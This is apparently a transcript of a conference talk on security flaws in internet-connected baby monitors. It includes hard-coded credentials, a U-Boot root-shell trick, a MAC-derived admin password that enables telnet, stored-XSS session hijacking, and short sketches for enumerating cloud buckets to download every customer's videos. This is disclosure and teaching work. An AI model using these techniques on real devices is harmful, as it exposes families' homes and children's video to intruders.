All right, good afternoon. Thanks for not being too drunk. You can still watch my talk, or fall asleep in the front row; either is fine. So this talk is a couple of things. The front of this talk is about research focused on internet-connected baby monitors: I did a large research study on nine devices about six or eight months ago. The latter part of the talk is about two newer pieces of research I released in February. One is on a connected children's smartwatch, if you will, and the other is a connected smart toy. So we'll have a little bit of a break in there in terms of content, but that's the flow for today. IoT is a really fun place to play for security research right now. There's no limit on attack surface. There's nothing but crazy dependency chains, outdated libraries, and poor web apps like we've been dealing with forever and ever: buffer overflows, everything you could imagine. Every research project you've done, IoT can encompass all of those in just one product, and that's why it's a lot of fun. There's a lot to go after, a lot to look at. For IoT vendors in general, it's a really hard thing. We like to pick on vendors, but at the same time, very often these vendors have a really good idea, they want to go to market, and they say, well, how do we do that? So they go to an ODM, whomever in Taiwan; they get a chipset, an SoC; they get some firmware; they pop a web server on it and go, okay, that's the start. And then they go, well, now we need to encode video, or we need to transmit files, we need to host things in the cloud somewhere. So now they have vendor one, vendor two, vendor three, vendor four, and vendors one through four all have APIs and their own credential schemes and their own terrible cross-site scripting everywhere, web apps and SQLi everywhere. So it's a really hard thing, because you're picking a supply chain.
And the more of these things you have to build into your ecosystem for this device, the more avenues an attacker will have to go after. So it's a very hard thing to do well. We see it at companies big and small; it's a daunting task to hire a really well-balanced security team. If you think of IoT as just a short list: most IoT devices you'll see will have some sort of mobile app; there are going to be cloud services; there might be an API; web apps for sure; the hardware, the firmware, all the network protocols, all the wireless protocols, and then all the crypto within each of those pieces. It's hard enough for big companies with lots of money and resources to do security well, especially when you have this many things to secure. But a lot of the IoT vendors you're buying devices from are actually really small companies. Even when they're big names, very often it's really small subsidiaries or pieces of that umbrella doing the work, with no security team, no security engineering experience, no crypto experience, no web app security experience. So it's a really hard thing for companies to do well. The other thing happening right now is a lot of growth and maturing in IoT. There are a lot of frameworks being proposed, a lot of standards being proposed, a lot of working groups, a lot of very large companies putting a lot of money into a problem that they don't really know how to solve yet. It's a tough time, and for companies coming into the IoT market, there's not a lot of guidance to help them. They kind of have to piecemeal security into their products, like most companies already do, and hope for the best. The quick part here I want to go over: I like security talks that actually talk about how security research works.
So if you're looking to get into IoT hacking, or just hardware hacking and some of these other pieces, hopefully this is a quick little primer where you might find a tip or two and find it interesting. One thing, of course, when it comes to embedded hardware: you want firmware. Firmware unlocks all kinds of secrets. People love to hide crypto keys, they love to hide hard-coded passwords, and there's all kinds of interesting stuff, as well as, obviously, attacking the software itself. If you have a dynamic analysis environment for a binary, one that's actually the host environment, it's a much easier thing than doing everything in a bubble and hoping things will work in real life. And there are a lot of different ways to get firmware. One of the easiest, when it's possible: many devices have these small-outline integrated circuits, SOIC packages or whatever you want to call them. They're little flash memory packages, effectively. With a $10 Pomona test clip, a couple of jumper wires, and then something like a Bus Pirate or a Shikra or a Raspberry Pi, anything that can speak SPI, which is a serial communication protocol, you can dump the firmware bit for bit. You don't have to desolder, you don't have to rip chips off and break the device. You just clip on and run flashrom, an open source tool that has huge, huge support for many different package types and configurations of memory, and it pulls all the firmware data off. It's fantastic, right? So if you're looking to get into this, it's a very low barrier to entry just to start getting information off these devices. There are other ways, and we'll talk about some of them incidentally: you can man-in-the-middle the firmware during an update, or sometimes the vendor actually provides the firmware for download, though less and less these days. Once you have the firmware, the tried-and-true method is running something like binwalk.
And binwalk will go through that image and basically carve out the pieces that are file systems, the pieces that are kernels, and all the other components of the image you might have dumped. From there, you can mount the file systems, walk through them, look for binaries, look for password files, whatever you're looking to attack. So a lot of good value, very cheap, easy to do. Brute force: once you've maybe gotten a shadow file, you should probably try to crack the passwords in it. That seems pretty straightforward, so Hashcat or anything else that can run brute-force attacks against a password file of any sort is great. The other thing, and this is a little bit of a stretch for brute force, is that many of these devices have web APIs, and very often they're documented in the mobile apps. If you're watching traffic over the network, you might see some DNS requests fly by and go, oh, that's a weird host name. And if you start Google dorking around and looking up certain host names, you can very often find data. This little screenshot is real data: some user, and all of the JSON output of the records of their account, indexed by Google. This is the API for one of the larger IoT brands, Withings; they have scales and baby monitors and all kinds of other internet-connected devices, so one of the bigger brands out there. UART: you'll see a JTAGulator here, and some of you might say it's sacrilege to use a JTAGulator for UART, but UART is actually supported on the JTAGulator; you can enumerate UART with it. And UART is effectively a serial console, right? That's what it comes down to. So plug a couple of wires in; very often the pins are even silkscreen-labeled TX/RX. I mean, it's usually not hard to find. But once you have a UART, you might get a prompt, like the one in the middle there, to actually log in. So maybe you don't have credentials yet.
Maybe you do, and you can log in, or you can try to brute force them and log in that way. The other thing that happens very often is you'll see something like U-Boot, the bootloader you'll find a lot in embedded hardware. U-Boot will let you drop into its configuration, and you can do things like append kernel parameters to the boot sequence: just add init=/bin/sh or whatever shell the device has, or do single user mode by tacking single or 1 onto the end of the kernel arguments. And now you're logged into that environment, and you can change the password and just log in yourself whenever you want. So, a lot of different ways, but UART gives you visibility into that embedded device. These things are black boxes, and UART is a really quick way to get an interface and actually work in a shell directly on that platform. JTAG, proper JTAG: the JTAGulator can also enumerate pins here. There are a bunch of pins in a JTAG configuration, and the hard part is knowing which pin is which; the JTAGulator will enumerate the combinations for you and save you a lot of time over move a jumper wire, reconfigure, move a jumper wire, reconfigure. Then you can use something like a J-Link, a really cheap, very effective device, or any device that can interface with something like OpenOCD, which can talk these protocols for boards that are pre-configured in it. And the cool thing about JTAG is that it's very, very low level. It's made for testing, right? So you can do things like dump the live memory of the actual running device over GDB and start interrogating it. You can also do things like edit memory.
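That U-Boot trick, interrupting the bootloader over UART and appending kernel arguments, might look something like this at the serial console. This is an illustrative sketch only; the prompt, environment variable names, and existing bootargs vary from board to board:

```
U-Boot> printenv bootargs
bootargs=console=ttyS0,115200 root=/dev/mtdblock2
U-Boot> setenv bootargs ${bootargs} init=/bin/sh
U-Boot> boot
```

From the shell that drops you into, you can remount the file system read-write, reset the root password, and then log in normally whenever you want.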
So let's say, and this actually does happen, sometimes there will be configurations in the bootloader that prevent you from doing single user mode or something else. You think, well, I can't do single user mode; they've hot-patched that so I can't bypass it that way. But you can halt execution of the live device via JTAG, change the bytes in memory, append the single user mode argument in memory, and then resume execution, and you'll actually bypass that bypass prevention, or whatever you want to call it. So when it's available, and it's not always easily available, sometimes it's actually very annoying to interface with JTAG on a device, whether it's the pads or the pinout or whatever, but once you do have access, it's basically as low-level as you could ever want to go, and there are a lot of cool tricks you can do just by having that access. Mobile applications, especially for consumer IoT: we've seen terrible, terrible mobile applications for many years, and IoT is like the best of the terrible. Hard-coded everything, backdoor passwords, static strings for tokens that should be doing real API calls. It's amazing what's inside, though. Like in the top example, you can find a link to firmware. That's handy: you can just download the firmware yourself and not have to dump it. You see a lot of cleartext stuff, of course, API calls for different mobile apps and backend services. And especially when it comes to something like Android. Android is concerningly simple for the most part. If you throw an APK at dex2jar, you get basically pretty good Java back, enough quality of Java in most cases to start understanding how the software works and to look at some of the methods involved, and we'll see a few examples of that later.
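As a concrete sketch of that triage step: once a decompiler has given you something readable, a first pass is often just grepping the output for the kinds of strings mentioned above. The find_secrets helper below is hypothetical, not a standard tool, and the patterns are only a starting point:

```shell
# Hypothetical first-pass triage over decompiled app source: flag
# hard-coded credentials, tokens, and endpoint URLs. Point it at the
# directory your decompiler produced.
find_secrets() {
  grep -rEin 'password|secret|api[_-]?key|token|https?://' "$1" | sort -u
}
```

A typical flow, assuming the dex2jar tools are on your PATH, would be something like: d2j-dex2jar app.apk -o app.jar, unzip the jar, run a Java decompiler over the classes, then run find_secrets over the result and start reading whatever it flags.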
Wireshark and Nmap, general network tools: all of this stuff has some sort of internet connectivity, or at least local LAN connectivity. So you're looking for things like, are they doing weird multicast DNS things? Are they doing UPnP? What kind of attack surface do we have there? As well as just watching network traffic and seeing what flows over. Many of the vendors, luckily less so now, but up until very, very recently, had almost no crypto stack in anything. A lot of the chipsets they were using were very underpowered, because they were very cheap and very old. And if they did support crypto, a lot of the developers just didn't care, because it's out of sight, out of mind. A lot of developers think, well, you're using a mobile app, you don't see that there's no HTTPS, so we're just going to skip over that, don't worry about it. And that's unfortunately how it happens. And the web apps: so you have web apps in the cloud; that's a cross-site scripting bug on a login page for one of the camera platforms. And then many of these devices actually have backend web applications. So your mobile app might be communicating, right, sending some data somewhere and doing some requests, and very often these are full web apps that they're just using as a really bloated API. They've basically taken an entire web application and thrown it on a web server just to do basic GET and POST stuff. So there's a huge amount of attack surface, a huge amount of interaction, but really for no purpose. And what keeps happening is a lot of these vendors go to the same chip manufacturer, or the same video-encoding chip manufacturer, whatever, who says, oh, here's a sample app we built. And then they just copy and paste that, and we see where we get with that. So that's a little bit of an overview, a handful of the techniques you can use.
Obviously each device is a little bit different; if it's Bluetooth, or if there's Wi-Fi, you can do many other kinds of attacks. So here's a breakdown of the devices, just for an overview. In doing this research, I wanted to take almost a case-study approach: a lot of vendors, a number of price points, from really cheap to pretty expensive, all in US dollars for what it's worth, where they sit on Amazon, how popular they are on Amazon, and the features themselves. And as we go through this, one of the questions I reasonably asked myself, and a lot of people have asked me since, is: can you buy security? Are you buying better security with these devices? The answer is no, very plainly the answer is no, and we'll see in detail why soon. So this section will basically bounce through things; some are just funny. I wouldn't necessarily consider them vulnerabilities, I just find them funny or weird or bad. As you reverse engineer things, you find things that you think are just kind of comical. One thing that matters for design patterns' sake: when you have a black box in your home somewhere, for most consumers your only interaction with it is probably either a web app or a mobile app. You don't know what that device is doing. Your phone or your browser says, oh, I'm currently configured like this, I'm doing this, I have this feature on or off. And with this first baby monitor, the Withings one, I was watching traffic; rtmpdump is pretty simple for taking RTMP traffic and basically saving it to a file. So, watching the stream, I shut off the feature: basically, baby monitor disabled, right? And I checked it at five minutes, it's still streaming; ten minutes, fifteen minutes, twenty minutes, and at twenty minutes I just gave up.
I mean, whyever you would turn it off, at that point the app is lying to you. The stream is live; it's not cached, it's literally still live-streaming the entire video and audio of that camera. And that's a really important thing, especially if you do software engineering: we often miss test cases right where privacy and security overlap. As a researcher I'm looking for security issues, but what I'm finding here really amounts to a privacy issue. The vendor is telling me this is not streaming, but it actually is. Here's a weird piece of code, one of many weird pieces of code you will always find, especially reversing bad mobile apps. This was just a method, and when you're doing basic reversing, you're looking for interesting methods, the things that might contain something cool or important. So I found md5RootSession as a method name. That's a great combination of terrible things you don't want to see in code. And it does this weird concatenation, and I'm like, well, what the hell is that? And I see an email address, and I'm like, oh God; and I see MD5 with the email, and I'm like, oh no. And finally there's this mChunk method. The TL;DR on this is that the mChunk method is effectively a weird obfuscation routine that takes an integer, goes through a loop, and outputs some data to concatenate onto this very secure token. At some point, if you're paying attention, you'll notice that the for loop starts and immediately hits a return. So all of the code below it does nothing. And again, why did this happen? Did one developer think, this seems like a great idea, and some other developer said, this is a dumb idea, and they just gave up? Or were they debugging it because it broke something and never turned it back on? Whatever.
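To make the pattern concrete, here is a hypothetical transliteration into shell; the real code was Java, and the email address and function names here are invented. The point is the loop that returns on its first pass, leaving everything below it dead, so the "session token" reduces to MD5 of a hard-coded email plus the input:

```shell
# mchunk is supposed to be an obfuscation loop, but the first
# iteration hits return immediately, so the math below never runs.
mchunk() {
  for i in $(seq 1 "$1"); do
    return 0           # returns on the first pass...
    i=$(( i * 31 ))    # ...so this line is dead code
  done
}

# The "secure" token: MD5 over a hard-coded email plus the input.
md5_root_session() {
  mchunk 16
  printf '%s' "support@example.com$1" | md5sum | awk '{print $1}'
}
```

Run it against any input and you get a stable 32-hex-character token, and nothing about the loop changes the output, which is exactly why pulling the method into its own file and running it reproduces valid tokens.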
The reality is, whether it had been enabled or not, you can take that method out, put it into a Java file, javac it, and just run it, right? You'd get the data back. So it's one of those things that is maybe obfuscated enough if you're not looking at the source code and you're doing some other attack against it, or watching the wire or whatever else. But just weird things you'll see. Wi-Fi baby. So this is a $260 camera. Very, very expensive, very ugly, but very expensive. 2015 model; it literally has "2015 model" in the name. And I get it out of the box and start looking at all the stuff. I don't naturally run vulnerability scanners, because I don't find a lot of value in them, so it's more just diving into things. But eventually I started looking at the UPnP stuff and what's in there, and I scanned a couple of things and noticed that this 2015 camera that costs $260 US has two 2012 remote code execution bugs just built in. I'm like, oh, my firmware must be super out of date. There's no firmware update at all. There's nowhere on the site to get firmware. There's no method built in to let me install firmware as a normal user of the platform. So: extremely expensive camera, one of the better-known brands in fact, and it comes with two CVSS 10 bugs. That's pretty handy. And this just shows you, again, you cannot buy security. This is literally the highest-priced camera I looked at. Then on the lowest-end camera, and this looks even worse, as you can tell from everything about this photo, a terrible camera, it's only sold on Amazon. There's no company behind this camera; in fact, we found that out when we were disclosing vulnerabilities. And one thing I should mention: this talk is more like a survey course. I'm not going to go over the same bugs for every single camera, because we'd be here all night.
There are bugs I didn't even bother submitting, because I was just too tired of submitting bugs to people. So this is an example where the camera is just terrible, cheap, whatever. One cool thing, though, as a feature: they basically give you an FTP account for every camera, with an unlimited quota as far as I could test. So if you're looking for a new warez host or something, just get your FTP credentials for free and use it for your cloud storage, or whatever. All kinds of useful things. One subtle distinction that really matters, and it's one of those annoying InfoSec things: people use "hard-coded credentials" and "default credentials" interchangeably, which is not right. Up at the top here, admin/admin: this is the web configuration for the camera's backend service, like all these things have. Admin/admin is a default credential. When you buy the camera and set it up, you can change admin/admin, okay? It's still a terrible default, I agree, but it's a default; I can change it. Unfortunately, user/user and guest/guest are hard-coded. The owner of this camera has no knowledge they exist. There is no way to change them, and nothing that would tell you they're there. But they're there, and you can just go to, of course, the unencrypted URL and stream the camera live with user/user or guest/guest, no problem. And then it had this weird Linux file system where admin was effectively root, because they just chmod 777 everything, you know, as you do, and there's a terrible hard-coded root password that's the same on every camera. So that's that one. A quick overview, if you want to think about how little crypto is used: four different interfaces for one camera, none of which use crypto. Zero crypto. Streaming, account registration, basic configuration, everything just skips crypto altogether. Trend Micro, I don't think they fixed it; I just redacted it and forgot to even un-redact it.
It's the login page, if you want to do that. But again, another example. TRENDnet, sorry, not Trend Micro, my bad. TRENDnet has had a history: the Federal Trade Commission in the States came down on them pretty hard a number of years ago over a line of cameras with firmware where you basically went to a CGI URL and, oh, here's your camera. People made Twitter accounts to index everyone's cameras and put them on the internet, and it was a big to-do. So, looking at their camera, I was a little bit interested in how much their security program had matured. Login page cross-site scripting: not exactly a great indicator, which is too bad. And then default creds, root/admin. Trust me, there are a lot of root/root and root/admin logins via Telnet and via SSH by default, and these services are very often listening by default. In this case, in one of the firmware updates I got while I was testing, they actually turned off Telnet, which is good, right? But as developers, as engineers, if you're working with design teams: always take out the stuff you don't need. Just turning it off may be little more than obfuscation; a good attacker can usually get the service back on, depending on the file system and some other things. Certainly leaving these things behind is a bad idea, and we'll talk about why in just a minute. So, the iBaby M3S, one of two iBaby cameras. iBaby is like the number one brand for internet-connected baby monitors. I actually still get emails; I got put on some mailing list somehow from contacting them to disclose, I think, and they put me on the new product mailing list. I'm like, you should probably take me off that list; it's probably not going to help you.
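If you want to answer the "what's listening by default?" question yourself without a scanner, bash's built-in /dev/tcp is enough for a quick check. The address below is a documentation placeholder standing in for whatever IP the camera picked up on your LAN:

```shell
# Probe a few common embedded-device ports (telnet, ssh, http, rtsp).
# 192.0.2.10 is a placeholder address, not a real camera.
port_open() {
  timeout 1 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

for p in 23 22 80 554; do
  if port_open 192.0.2.10 "$p"; then
    echo "port $p is listening"
  fi
done
```

Nmap gives you far more detail, of course; this is just the quickest possible "is Telnet really on by default?" sanity check.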
So this is, again, a pretty expensive camera from a very well-known brand. Scan it with Nmap: okay, it's got Telnet. I had dumped the file system, so I already knew the username and password: admin/admin. So this is Telnet by default, on current firmware, on a very expensive camera, username admin, password admin. And then the red flag. If you're a UNIX person or a crypto person, I'll give you a hint: even ignoring the uname -a there, just look at the password file. First off, if you see a password hash in the password file and it's not, like, 1994, there's a problem, because there should be a shadow file, not hashes in the password file, anymore. But when you see a hash that small, without the $1$ or similar prefix designating which algorithm is used, it's going to be UNIX crypt, DES crypt, basically interchangeable terms. And that's a red flag that everything else on this thing is probably super old. So this is roughly a 2014, 2015 camera, with: U-Boot, the bootloader again, from 2005; OpenSSL from 2007, 0.9.8, which is actually too old for Heartbleed, so they got a security benefit from being super outdated; a Linux kernel from 2007, for which the number of local root exploits is just, there's probably an integer overflow in the count of local root exploits; BusyBox, which provides all the base-level tools in a lot of embedded systems; and UNIX crypt. And of course it's running Telnet. Again, this is a really big brand, a really big vendor, and a $150 or so camera. They did have some encryption, and they put it, of course, in their mobile app. And if you want to talk about ECB mode, that's a whole other crypto
joke for later, but the important part here is that they hard-code a really crappy passphrase, and that passphrase is how you encrypt and decrypt every backup. So if you ever happen to Google dork and find these backups published online, or you're attacking a network and doing your thing, you can just decrypt them that way, pulling the key out of the mobile app altogether. Oh, and then XXTEA. How many people consider themselves crypto people? Okay, how many of you have done anything with XXTEA before? You really aren't crypto people then, clearly. Where were you working with XXTEA? Just for funsies? Yeah, okay, fair enough. And am I correct in saying, because I've been saying this and I think it's a fair statement, that the complexity of the algorithm is so low that on low-powered hardware, that might be a reason to use XXTEA? Okay. So, you know, I've looked at a lot of devices in my life, and mobile apps too, and I've never seen anyone actually use XXTEA. But hey, was the Xbox using XXTEA, or was that something else? Yeah, okay, I think the original Xbox used it for the code signing, or somewhere in there. So, here's the other iBaby. This is the more expensive one, the newer one, and you think, oh, newer, fancier, whatever. Still Telnet by default, admin/admin login, and all the API calls for the mobile app are unencrypted over the internet, logins and all that stuff. But we're starting to segue into the just-bad-things-that-are-going-to-happen-to-your-children part now. As part of looking this stuff up, there was this old website, iBaby Cloud. It wasn't really documented anywhere; I just happened to look it up when I saw the API calls and tried to log in, and there's a login prompt. Again, this is not something they talk about readily; they want you to use the mobile app. This just happens to be there.
So when I started hacking on this stuff, that didn't happen; that right-hand image did not happen. At some point in time, and it was not my fault, I guarantee you, someone deleted a library on the server or something, and all of a sudden the whole application died, because it could no longer run the hashing routine to log you in, or whatever. Before that happened, though, we had this situation. As you do, I made multiple accounts. I know it's hard to see up on the screen, but the first one, the proper account, is mark.stanislav at gmail.com; the second one is mark.stanislav with no dot, right? For my email provider, that's the same exact email address. But for accounts inside a website's database, it's a completely different account. It's like adding a plus tag or something else to your email for testing. So: proper account, log in, and it's got some URL with, I guess, the cam ID up there. And the first thing you always do with your multiple testing accounts is start copying and pasting shit, right? Does this work here? Does this work there? Can I take a privilege here that should be for this person, not that person? And sure enough, I just copy and paste from one account to the other, and I'm looking at the camera details for someone else's account. So, a direct object reference, basically the simplest thing in the world, right? Copying a URL is very tough. On that first screen you've got the camera ID, MAC address, firmware; there's the P2P UID, which could be interesting for some sort of attack, but it's not really directly scary stuff, necessarily. Then I went to this page, and it had this alert information.
So, most of these cameras have a cloud service behind them, and one of the main features you buy them for, especially at the higher price points, because the service is built in, is the idea that if there's a loud sound in the baby's room, or motion in the baby's room, it'll take a 30-second clip. It caches a few seconds, so it shows you what happened just before the sound, up to the sound, and a little bit after; records that; puts it online; and then your mobile phone might get a notification saying, hey, there was a sound, you should check that out, is your baby okay, whatever. So this is an example where I log in, I get here, and the preview images are broken. I'm like, oh, maybe this is a really old site and it's all broken and doesn't work. Well, if you hover over the picture, there's a link there; you look at the HTML, and there's a link there. And having looked at the mobile traffic and how it worked, I realized what they had done. They have, which is completely fine, Amazon on the back end for video uploads: S3 buckets, with CloudFront for the CDN part. But if you are on one of these pages for any camera, you can effectively enumerate all the videos from the HTML. They have one bucket for all videos, for all customers. They do not encrypt data before it's uploaded, and in fact, when you stream video, they don't authenticate you, they don't serve it over HTTPS, they don't do anything crypto, even though that's all built in and free with S3, literally. They just don't use it for some reason.
And, let me go back a slide here: if you look at the URL up there and you see the cam ID, it's kind of a simple thing to enumerate. Start with some number you have, like this camera ID, and work backwards and forwards within a certain key space, and you can very quickly get a 200 response or not, and figure out which IDs are real cameras, and away you go. Once you have that, you literally just append the camera ID to that CloudFront URL, because there are actually per-camera directories, which is super helpful for us, and then you have the AVI file names for the videos from the alert page. So you iterate to find all the cameras, you iterate to find all the videos, and what you've done is download every single alert video for every single camera for every single user, very quickly. It's a very, very simple process: one bash for loop and wget gets you pretty much on your way. So this is a great example of where IoT starts becoming a big problem, because everything that fails in IoT is almost always a failure at scale. It's not, oh, I popped one device, I got one shell, I got one X or one Y. You've stolen every video from every camera in effectively one shot. And this is another thing: they could have used individual IAM credentials for every account, and that would have prevented this. They could, of course, have fixed the web bug; that would have helped too. They could sign request URLs and do all that. They don't do any of it, and again, it's all free in AWS; they're just not using any of it. So we stole all the videos from all the people. That's not great.
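That enumeration really is about as short as described. Here's a sketch with the network calls stubbed out; the CDN host name and URL layout below are invented placeholders, not the real endpoints:

```shell
# Hypothetical CDN host; one directory per camera ID, AVI clips inside.
cdn="https://dxxxxxxxx.cloudfront.example"

alert_url() {
  printf '%s/%s/%s\n' "$cdn" "$1" "$2"
}

# Walk a camera-ID key space. In a real run you'd replace the printout
# with: wget -q --spider "$url" (a 200 means the camera exists), then
# wget -r -A '*.avi' to pull every alert clip in that directory.
enumerate_cams() {
  for cam in $(seq "$1" "$2"); do
    alert_url "$cam" ""
  done
}
```

Per-account IAM credentials, signed request URLs, or even just authentication on the stream would each have broken this loop; none were in place.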
The other thing to think about, again with design patterns, because I've developed software too: a lot of people turn notifications off on their apps, and a lot of people have inbox-20,000 on their mail and don't care. So think about the parents. I have a four-month-old baby; I'm not worried about whatever my app is yelling at me about, I'm changing a diaper or something. The reality is we ignore these alerts all the time, so you might have hundreds or thousands of videos sitting in the cloud that you just never delete, because you don't care; it doesn't really matter to you. And then I come in and download all those videos you don't care about. You may never even realize they were being recorded, because these cameras do this by default; it's not a feature you have to enable. Kind of crazy. Back in 2013, I did some research on the iZon camera. Did anyone have that camera a few years back? Okay. So I did that research, and cameras are always just a terrible time. When I started researching this Philips device, I thought, "It's a UNIX system, I know this," right? Like Jurassic Park. This looks familiar; I can deal with this. So my question really wasn't how do I own this thing, because I had owned it before. The question was: are the same things I found wrong still wrong, multiple years later, on a different vendor's product? Did the upstream provider of the firmware actually fix their stuff, along with the app-stack things that were unique to this particular chipset? The answer is no. It still does no SSL anywhere, and this is all default app-stack behavior, built into the platform that these two cameras both share.
The same three UNIX accounts that were hardcoded in that camera are still hardcoded in this camera. The firmware upgrade process is still insecure. One thing I like to point out, because people sometimes glaze over this and go, "oh, it's secure": the whole firmware update process is over HTTP. It's clear text, so you can manipulate it, no problem. And then you'll see there's an image file, which is the firmware, and an MD5 sum. And you might think, oh, an MD5 sum, they're checking the integrity. Yes, but they're checking the integrity of something that's going over HTTP. I can man-in-the-middle both things: I can intercept the firmware, give you a different firmware, compute my own MD5 sum, and put that into the other file, and you accept both. It's not signed; that's the question you're probably asking. No, it is not signed. There's no cryptographic signature over that MD5 sum to validate against any PKI anywhere. A completely insecure upgrade process. Telnet was enabled by default until recently, at least as of when I originally made this slide deck. But as we talked about earlier, if you're not using something, you should probably ditch it and not just leave it there, and here's why. Start with the top right: there was literally a script on this camera, cam_service_enable.cgi, that is just a shebang line, /bin/sh, and "telnetd &". It just starts telnetd. So telnet is off by default, and one URL turns it back on. And the credentials are hardcoded: the user is root, the camera model is B120, so of course the password is b120root. Very simple, very useful. You log in, you have root on this camera, and you enabled telnet via one HTTP call. Now, you might be saying: surely that HTTP call to run the CGI script has some sort of authentication.
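The point about the unsigned MD5 sum is worth making concrete: if the attacker controls both files in transit, they simply hash their own firmware, so the checksum proves nothing. A minimal illustration with hashlib:

```python
# Why an MD5 sum served over the same HTTP channel as the firmware adds
# no security: the man-in-the-middle just recomputes it for the swapped
# image. The firmware bytes here are obviously stand-ins.
import hashlib

def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()

legit_firmware = b"legitimate firmware image"
evil_firmware = b"attacker firmware image"

# The attacker intercepts both the image and the checksum file and
# serves a self-consistent pair -- the device's check still passes.
served_image, served_checksum = evil_firmware, md5_hex(evil_firmware)
assert served_checksum == md5_hex(served_image)  # integrity check "succeeds"
# Only a signature over the hash, verified against a key already on the
# device, would detect the swap.
```

This is why "it has a checksum" never answers the question "is the update signed"; integrity without authenticity is trivially defeated by the same attacker who can tamper with the payload.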
And you're totally right, it does. But when we reverse the mobile app, we see a method called getMD5Hash, and getMD5Hash is how they create the admin password for this web app. It takes your MAC address, which is the parameter you see going into the method, truncates the result, and appends an "i". So if you can find the MAC address, and if you're on the network with someone you certainly can, you can generate the admin password for that camera in one step on the command line. So just from being co-tenant on a LAN, you can identify the camera, because we know what MAC vendor prefixes look like, generate the admin password, run that script, and log in as root. Now you've got your pivot point or whatever else you're after on that network. The one at the bottom is another scale thing. Cross-site scripting, for me, is the thing I almost don't even report to people anymore; we would spend all of our lives reporting cross-site scripting if that was what we wanted to do. As this process went on, a service called Weaved came up. Weaved is effectively the middleware provider that initiates the streaming connections for this camera over the internet. When you want to use your phone to check on your home remotely, they actually use Weaved to do the middle part. So there's a service you're not supposed to know about, but of course it's easy to log in when you know the credentials, and you find these API calls and so on. So I logged in and found there's a whole web backend for this thing, not very featureful, just some basic information. And I found multiple types of cross-site scripting. I figured, okay, whatever, I'll shelve it, maybe report it later.
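The derivation the app performs is roughly "hash the MAC, truncate, append a suffix." Here's a sketch of that shape; the truncation length and the exact suffix below are illustrative guesses, not the vendor's real values:

```python
# Sketch of a MAC-derived admin password, per the reversed getMD5Hash
# method described above. The hash-truncate-append shape comes from the
# talk; the truncation length and exact suffix are placeholders.
import hashlib

def derive_admin_password(mac: str, keep: int = 8, suffix: str = "i") -> str:
    """Derive the 'secret' admin password purely from a broadcast value."""
    normalized = mac.replace(":", "").lower()
    digest = hashlib.md5(normalized.encode()).hexdigest()
    return digest[:keep] + suffix

# An attacker on the same LAN learns the MAC from ARP traffic, derives
# the password, hits cam_service_enable.cgi to start telnetd, and logs
# in as root -- no physical access to the device needed.
```

The design flaw is independent of the exact constants: any password derived only from a value the device broadcasts on the local network is effectively public to everyone on that network.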
What I didn't realize at the time, and found while rechecking findings later, was that one of them was stored cross-site scripting, which is a bit more interesting than reflected. The next thing I figured out is that the stored cross-site scripting was in the basic device identifier. The other thing you have to know is that the session cookie is not HttpOnly. So we've got stored cross-site scripting and no HttpOnly on the cookie; we're effectively able to do stored session hijacking against whoever views a page with that data. Pretty straightforward. The bad news for them, great news for me: if you've developed web apps, you know the same interfaces are often just a privilege thing. You log in, the code on the backend is probably the same, and the view and the controller do different things based on whether or not you're an admin. And if you've ever dealt with backend administrative pages: if I have customers, I have an admin interface for my customers, and I'm probably listing the devices each customer owns so I can help them if they have a problem. So what we're talking about is not owning my camera, not owning the Philips cameras. Weaved is actually a multi-vendor IoT platform with many, many customers that all use them. If we have stored cross-site scripting, no HttpOnly, and we can influence the admin page when an admin logs in, now we're stealing admin cookies to the entire IoT platform, not just one device or one vendor. Scale, right? IoT and scale. So here's a brief high-level overview, pretty simple. And of course, all of this is clear text; none of it is encrypted.
One thing I hear a lot is, "oh, I use Shodan, I find all the things with Shodan." The reality is Shodan doesn't really work like that in the modern IoT era. A lot of these things are reverse-proxied, a lot of them do weird NAT traversal tricks, so you don't just have a port listening on the internet. In this case you kind of do, but it's on demand and it's ephemeral: it exists for a short time span, and only when you, the user of the device, want to see the camera. Otherwise your camera's not on the internet; it's just local. So what happens is: your camera's behind your home network, your phone's somewhere else, the internet is in between, which is the helpful part of this whole equation, and you say, I want to see my camera at home. Your camera makes an outbound, long-lived TCP connection to the middleware provider, and the middleware provider basically makes the two of you talk. And how they do this is they take one of their proxy hosts and a high-numbered port, and they put your entire camera's web server on the public internet, on a public host name and a public port. That is how this works. It gets worse, because we can scan the internet very fast now, and there are a lot of cool ways to do this. David Adrian, who's a really smart guy, has done, or helped with, most of the recent crypto papers out of U of M, along with a lot of other great people. So we might be able to find a camera on the internet, and that's great, but think back to the earlier attacks: for the admin password, we have to know the MAC address, and that poses a bit of a problem over the internet, given how TCP works. So we have some issues there.
The good news, though: as soon as your camera is proxied onto the public internet, it drops all authentication. It's on the public internet, fully unauthenticated, with direct access to every single script on that camera's web server. That means I can put a link in a Skype channel with a couple of buddies, and they can click it over the internet and start telnetd on the camera inside my house. Or change passwords on it, or stream the camera over the internet: open VLC, go to that URL, and watch live video and audio, unauthenticated, done. If I didn't mention it, a lot of these vulnerabilities are really boring, and that's because IoT sucks. So I apologize, but it's not my fault these suck. Consider all these web vulnerabilities we've been trying to fix forever: we know how to stop cross-site scripting, we know how to stop SQLi. But IoT vendors in many cases, and I actually work with a lot of IoT vendors, for work and for other things we'll talk about in a second, are great product people with an awesome idea who have just never built anything on the internet. They outsource to some random guy here as cheap as possible, they outsource to some girl over there as cheap as possible, and all of a sudden they have huge dependency chains, out-of-date software, terrible mobile apps, terrible web apps, terrible APIs. And then you tell them, hey, your thing's broken and your baby's ugly, which is funny because it's baby monitors, and they go, what do you mean? I paid all this money to all these people. And I'm like, yeah, but you never had anyone test this and validate that the people doing your work are actually good at their jobs. These things happen. It's unfortunate, and luckily we can help a lot of them learn.
In fact, on a different research project a few years ago, not anything in this research, when I finally talked to the vendor after they stopped threatening to have me prosecuted, we had a nice conversation, and they fired their entire development staff. Everyone got fired, they hired a brand new team, and I had a call with them on everyone's first day. We went over the basics of security, all pro bono. I want these companies to be successful; there are just a lot of places to attack right now, unfortunately for them. So, Summer: a huge baby brand, definitely one of the bigger names in general, not just for cameras. They have this camera, expensive as well. Here's another soapbox design-pattern thing. Emailing passwords: we all know emailing passwords is not a great idea. I'm not going to talk about that; it's not interesting. Maybe this other part isn't either, I don't know. But the interesting bit is that they make your password your last name, truncated to eight characters, plus your unique group identifier, which is basically your account identifier for all purposes. And the group identifier is clearly an integer within a bounded range; it gets higher as time goes on. So you have a serial integer, plus a basically fixed parameter if you know, or can figure out, who you're targeting. Think of the number of people out there who would get this email and go: that looks like a really secure password, based on everything I know about passwords. It's got a capital letter, it's long, it's got this random number 